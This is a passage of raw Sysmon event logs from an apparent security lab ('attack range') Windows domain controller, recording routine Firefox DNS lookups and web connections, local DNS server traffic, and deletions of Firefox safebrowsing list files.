22542200x8000000000000000288284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.804{C8EA50B7-11AA-6216-1605-000000003802}2228star-mini.c10r.facebook.com0157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.802{C8EA50B7-11AA-6216-1605-000000003802}2228www.facebook.com0type: 5 star-mini.c10r.facebook.com;::ffff:157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.794{C8EA50B7-11AA-6216-1605-000000003802}2228youtube-ui.l.google.com02a00:1450:4001:830::200e;2a00:1450:4001:800::200e;2a00:1450:4001:801::200e;2a00:1450:4001:80e::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.790{C8EA50B7-11AA-6216-1605-000000003802}2228youtube-ui.l.google.com0142.250.184.238;142.250.181.238;172.217.16.142;216.58.212.174;142.250.74.206;142.250.186.46;142.250.186.78;142.250.184.206;172.217.23.110;216.58.212.142;142.250.185.78;142.250.185.110;142.250.185.142;142.250.185.174;142.250.185.206;142.250.185.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.789{C8EA50B7-11AA-6216-1605-000000003802}2228git.ffmpeg.org079.124.17.100;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.789{C8EA50B7-11AA-6216-1605-000000003802}2228www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:142.250.185.238;::ffff:142.250.184.238;::ffff:142.250.181.238;::ffff:172.217.16.142;::ffff:216.58.212.174;::ffff:142.250.74.206;::ffff:142.250.186.46;::ffff:142.250.186.78;::ffff:142.250.184.206;::ffff:172.217.23.110;::ffff:216.58.212.142;::ffff:142.250.185.78;::ffff:142.250.185.110;::ffff:142.250.185.142;::ffff:142.250.185.174;::ffff:142.250.185.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.788{C8EA50B7-11AA-6216-1605-000000003802}2228git.ffmpeg.org0::ffff:79.124.17.100;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000216749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:27.202{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF46BDB907CD616668209D26C7700004,SHA256=69618AD361CBDF0BE4860DA5669DDB0A24CA7BC15A838B20A441B3D1E6EA1CCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.808{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52416- 354300x8000000000000000288276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.805{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52567- 354300x8000000000000000288275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.805{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51745- 354300x8000000000000000288274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.804{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-54001-false127.0.0.1-53domain 354300x8000000000000000288273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.804{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-54001- 354300x8000000000000000288272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.789{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55755- 354300x8000000000000000288271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.781{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56488- 354300x8000000000000000288270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.776{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54001- 354300x8000000000000000288269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.775{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50752- 354300x8000000000000000288268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.752{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57075- 354300x8000000000000000288267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.751{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53871- 354300x8000000000000000288266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.751{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50751- 354300x8000000000000000288265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.751{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98f0:e32b:fbf:ffff-50751-true7f00:1:0:0:0:0:0:0-53domain 354300x8000000000000000288264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.736{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54551- 354300x8000000000000000288263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.736{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51477- 354300x8000000000000000288262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.736{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59942- 354300x8000000000000000288261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.736{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53904- 354300x8000000000000000288260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.727{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53548- 354300x8000000000000000288259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.726{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54328- 23542300x8000000000000000288258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.147{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.577{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53468-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x8000000000000000288256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.497{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53459-false52.32.121.91ec2-52-32-121-91.us-west-2.compute.amazonaws.com443https 354300x8000000000000000288255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.418{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53467-false2.22.118.162a2-22-118-162.deploy.static.akamaitechnologies.com80http 354300x8000000000000000288254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.415{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60469- 354300x8000000000000000288253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.394{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53466-false142.250.186.67fra24s05-in-f3.1e100.net80http 354300x8000000000000000288252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.387{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50866- 354300x8000000000000000288251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.385{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53462-false93.184.220.29-80http 354300x8000000000000000288250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.384{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53464-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x8000000000000000288249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.384{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53465-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x8000000000000000288248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.384{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58182- 354300x8000000000000000288247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.381{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56335- 354300x8000000000000000288246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.375{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53463-false93.184.220.29-80http 354300x8000000000000000288245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.373{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57773- 354300x8000000000000000288244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.370{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55525- 354300x8000000000000000288243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.355{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53460-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x8000000000000000288242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.355{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53461-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x8000000000000000288241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.354{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53070- 23542300x8000000000000000288364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.861{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=B50CF628E0082A7840D84D0CBE1CAD48,SHA256=544DF79BCEF9DC8E082021E342C2A1B12CD0B8BDAF3687E0F23785406EDF33AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.847{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=F130C472E963FF3CEED251C65964B927,SHA256=E5D2A5BBE8AA43751EF7F7BC3A817A0963D56272A4C9B6055E60929606186CE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.847{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=5F93E0F827909390D257EBB27C77F392,SHA256=5BCB684F3EE3B2EC2F4945655FBEF281C487399D6BF90451647DB1761715D4C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.847{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=9275B832091D9E3BFE50898A3BE022B5,SHA256=38C52A5435B625083000A054489B95E033F7B352377510DF668CEE749DE5803E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.847{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=8AC8A05028631170937EDA4CF0E0A35A,SHA256=456AB2C0E4E117D62DC529362EB22C725D410098868442729ADE5E4FF0822E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.843{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=7BBA9B83F0F213C5A723209D4C9962CE,SHA256=E1B8E7DEB0F34EEB6BF4D10E47E734A1FE829C365DF360B98646D7E11F2DD4C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.843{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=16BF2AA546411BA25DC80EA288D47143,SHA256=524EC56C023155C7BE4C84D5AEC4FE2D85DFBAB3C2FA27F82BCD35028D546F83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.843{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=69EE5B232870704AFCC0E8957AA42A0F,SHA256=EC8DF5279022B68C0B542EC1688889374754106DFADBF7CAF8337E3F98865941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.839{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=83BCEF27E5B36115C2ADBA73CE9A7D2B,SHA256=3F68B0FEFBD484094D6517761B2DC13C6A430DDE3B44FA6CCACA3E39052D2AAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.835{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=177BC07ECED26CEBE0441C318BD35BB8,SHA256=2A816C802C006DF75CA86E1497E4CF05DFB0F07DB0CD31C0EC30EDAF92C2DF75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.835{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.835{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.831{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=5F496076FECA522037C5580C52E16F12,SHA256=0DE345A12AB6DD96C303A88E39E8E075135231B17DD9602711435F4335B3BC84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.827{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=0A21D9287136B908195F2C123BF436B8,SHA256=EB7F7783CC38D3B13BAE25ECF12A92252A2B02C3FA2409F385BCE363F592730F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.827{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=A9EAD027B834DA468E48E2007957D4EF,SHA256=57C9A4F58EB34986EE2436EF480B593DCB39C1B7415D60AE14DE6FD6D67A387C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.739{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=C42CB15043AEB53B51DCACA2B1EB1CE3,SHA256=AF77BDEA477472170AC8C81D619E48181CFF816D0623CADC75B57464C476DBA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.739{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=A91852A681F45084829622A851799A10,SHA256=6EC0BAA09ACE101DDDC06AEF194ADFFAB35FAD3EDB8EA3963689D057A1DABBEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 